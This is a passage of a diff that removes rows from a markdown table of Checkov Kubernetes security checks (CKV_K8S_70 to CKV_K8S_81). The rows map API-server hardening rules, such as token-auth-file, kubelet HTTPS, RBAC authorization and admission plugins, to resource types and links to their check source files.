-| 2918 | CKV_K8S_70               | resource                         | ReplicaSet                                                                                       | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                          |
-| 2919 | CKV_K8S_70               | resource                         | ReplicationController                                                                            | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                          |
-| 2920 | CKV_K8S_70               | resource                         | StatefulSet                                                                                      | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                          |
-| 2921 | CKV_K8S_71               | resource                         | CronJob                                                                                          | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                            |
-| 2922 | CKV_K8S_71               | resource                         | DaemonSet                                                                                        | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                            |
-| 2923 | CKV_K8S_71               | resource                         | Deployment                                                                                       | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                            |
-| 2924 | CKV_K8S_71               | resource                         | DeploymentConfig                                                                                 | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                            |
-| 2925 | CKV_K8S_71               | resource                         | Job                                                                                              | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                            |
-| 2926 | CKV_K8S_71               | resource                         | Pod                                                                                              | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                            |
-| 2927 | CKV_K8S_71               | resource                         | PodTemplate                                                                                      | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                            |
-| 2928 | CKV_K8S_71               | resource                         | ReplicaSet                                                                                       | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                            |
-| 2929 | CKV_K8S_71               | resource                         | ReplicationController                                                                            | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                            |
-| 2930 | CKV_K8S_71               | resource                         | StatefulSet                                                                                      | Ensure that the --kubelet-https argument is set to true                                                                                                                                                  | Kubernetes              | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py)                                                                            |
-| 2931 | CKV_K8S_72               | resource                         | CronJob                                                                                          | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                      |
-| 2932 | CKV_K8S_72               | resource                         | DaemonSet                                                                                        | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                      |
-| 2933 | CKV_K8S_72               | resource                         | Deployment                                                                                       | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                      |
-| 2934 | CKV_K8S_72               | resource                         | DeploymentConfig                                                                                 | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                      |
-| 2935 | CKV_K8S_72               | resource                         | Job                                                                                              | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                      |
-| 2936 | CKV_K8S_72               | resource                         | Pod                                                                                              | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                      |
-| 2937 | CKV_K8S_72               | resource                         | PodTemplate                                                                                      | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                      |
-| 2938 | CKV_K8S_72               | resource                         | ReplicaSet                                                                                       | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                      |
-| 2939 | CKV_K8S_72               | resource                         | ReplicationController                                                                            | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                      |
-| 2940 | CKV_K8S_72               | resource                         | StatefulSet                                                                                      | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate                                                                                                   | Kubernetes              | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py)                                                      |
-| 2941 | CKV_K8S_73               | resource                         | CronJob                                                                                          | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                              |
-| 2942 | CKV_K8S_73               | resource                         | DaemonSet                                                                                        | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                              |
-| 2943 | CKV_K8S_73               | resource                         | Deployment                                                                                       | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                              |
-| 2944 | CKV_K8S_73               | resource                         | DeploymentConfig                                                                                 | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                              |
-| 2945 | CKV_K8S_73               | resource                         | Job                                                                                              | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                              |
-| 2946 | CKV_K8S_73               | resource                         | Pod                                                                                              | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                              |
-| 2947 | CKV_K8S_73               | resource                         | PodTemplate                                                                                      | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                              |
-| 2948 | CKV_K8S_73               | resource                         | ReplicaSet                                                                                       | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                              |
-| 2949 | CKV_K8S_73               | resource                         | ReplicationController                                                                            | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                              |
-| 2950 | CKV_K8S_73               | resource                         | StatefulSet                                                                                      | Ensure that the --kubelet-certificate-authority argument is set as appropriate                                                                                                                           | Kubernetes              | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py)                                              |
-| 2951 | CKV_K8S_74               | resource                         | CronJob                                                                                          | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                      |
-| 2952 | CKV_K8S_74               | resource                         | DaemonSet                                                                                        | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                      |
-| 2953 | CKV_K8S_74               | resource                         | Deployment                                                                                       | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                      |
-| 2954 | CKV_K8S_74               | resource                         | DeploymentConfig                                                                                 | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                      |
-| 2955 | CKV_K8S_74               | resource                         | Job                                                                                              | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                      |
-| 2956 | CKV_K8S_74               | resource                         | Pod                                                                                              | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                      |
-| 2957 | CKV_K8S_74               | resource                         | PodTemplate                                                                                      | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                      |
-| 2958 | CKV_K8S_74               | resource                         | ReplicaSet                                                                                       | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                      |
-| 2959 | CKV_K8S_74               | resource                         | ReplicationController                                                                            | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                      |
-| 2960 | CKV_K8S_74               | resource                         | StatefulSet                                                                                      | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py)                                      |
-| 2961 | CKV_K8S_75               | resource                         | CronJob                                                                                          | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                          |
-| 2962 | CKV_K8S_75               | resource                         | DaemonSet                                                                                        | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                          |
-| 2963 | CKV_K8S_75               | resource                         | Deployment                                                                                       | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                          |
-| 2964 | CKV_K8S_75               | resource                         | DeploymentConfig                                                                                 | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                          |
-| 2965 | CKV_K8S_75               | resource                         | Job                                                                                              | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                          |
-| 2966 | CKV_K8S_75               | resource                         | Pod                                                                                              | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                          |
-| 2967 | CKV_K8S_75               | resource                         | PodTemplate                                                                                      | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                          |
-| 2968 | CKV_K8S_75               | resource                         | ReplicaSet                                                                                       | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                          |
-| 2969 | CKV_K8S_75               | resource                         | ReplicationController                                                                            | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                          |
-| 2970 | CKV_K8S_75               | resource                         | StatefulSet                                                                                      | Ensure that the --authorization-mode argument includes Node                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py)                                                          |
-| 2971 | CKV_K8S_77               | resource                         | CronJob                                                                                          | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                          |
-| 2972 | CKV_K8S_77               | resource                         | DaemonSet                                                                                        | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                          |
-| 2973 | CKV_K8S_77               | resource                         | Deployment                                                                                       | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                          |
-| 2974 | CKV_K8S_77               | resource                         | DeploymentConfig                                                                                 | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                          |
-| 2975 | CKV_K8S_77               | resource                         | Job                                                                                              | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                          |
-| 2976 | CKV_K8S_77               | resource                         | Pod                                                                                              | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                          |
-| 2977 | CKV_K8S_77               | resource                         | PodTemplate                                                                                      | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                          |
-| 2978 | CKV_K8S_77               | resource                         | ReplicaSet                                                                                       | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                          |
-| 2979 | CKV_K8S_77               | resource                         | ReplicationController                                                                            | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                          |
-| 2980 | CKV_K8S_77               | resource                         | StatefulSet                                                                                      | Ensure that the --authorization-mode argument includes RBAC                                                                                                                                              | Kubernetes              | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py)                                                          |
-| 2981 | CKV_K8S_78               | resource                         | AdmissionConfiguration                                                                           | Ensure that the admission control plugin EventRateLimit is set                                                                                                                                           | Kubernetes              | [ApiServerAdmissionControlEventRateLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlEventRateLimit.py)                                        |
-| 2982 | CKV_K8S_79               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                              |
-| 2983 | CKV_K8S_79               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                              |
-| 2984 | CKV_K8S_79               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                              |
-| 2985 | CKV_K8S_79               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                              |
-| 2986 | CKV_K8S_79               | resource                         | Job                                                                                              | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                              |
-| 2987 | CKV_K8S_79               | resource                         | Pod                                                                                              | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                              |
-| 2988 | CKV_K8S_79               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                              |
-| 2989 | CKV_K8S_79               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                              |
-| 2990 | CKV_K8S_79               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                              |
-| 2991 | CKV_K8S_79               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin AlwaysAdmit is not set                                                                                                                                          | Kubernetes              | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py)                                              |
-| 2992 | CKV_K8S_80               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                        |
-| 2993 | CKV_K8S_80               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                        |
-| 2994 | CKV_K8S_80               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                        |
-| 2995 | CKV_K8S_80               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                        |
-| 2996 | CKV_K8S_80               | resource                         | Job                                                                                              | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                        |
-| 2997 | CKV_K8S_80               | resource                         | Pod                                                                                              | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                        |
-| 2998 | CKV_K8S_80               | resource                         | PodTemplate                                                                                      | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                        |
-| 2999 | CKV_K8S_80               | resource                         | ReplicaSet                                                                                       | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                        |
-| 3000 | CKV_K8S_80               | resource                         | ReplicationController                                                                            | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                        |
-| 3001 | CKV_K8S_80               | resource                         | StatefulSet                                                                                      | Ensure that the admission control plugin AlwaysPullImages is set                                                                                                                                         | Kubernetes              | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py)                                                        |
-| 3002 | CKV_K8S_81               | resource                         | CronJob                                                                                          | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                  |
-| 3003 | CKV_K8S_81               | resource                         | DaemonSet                                                                                        | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                  |
-| 3004 | CKV_K8S_81               | resource                         | Deployment                                                                                       | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                  |
-| 3005 | CKV_K8S_81               | resource                         | DeploymentConfig                                                                                 | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used                                                                                                     | Kubernetes              | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py)                                                  |
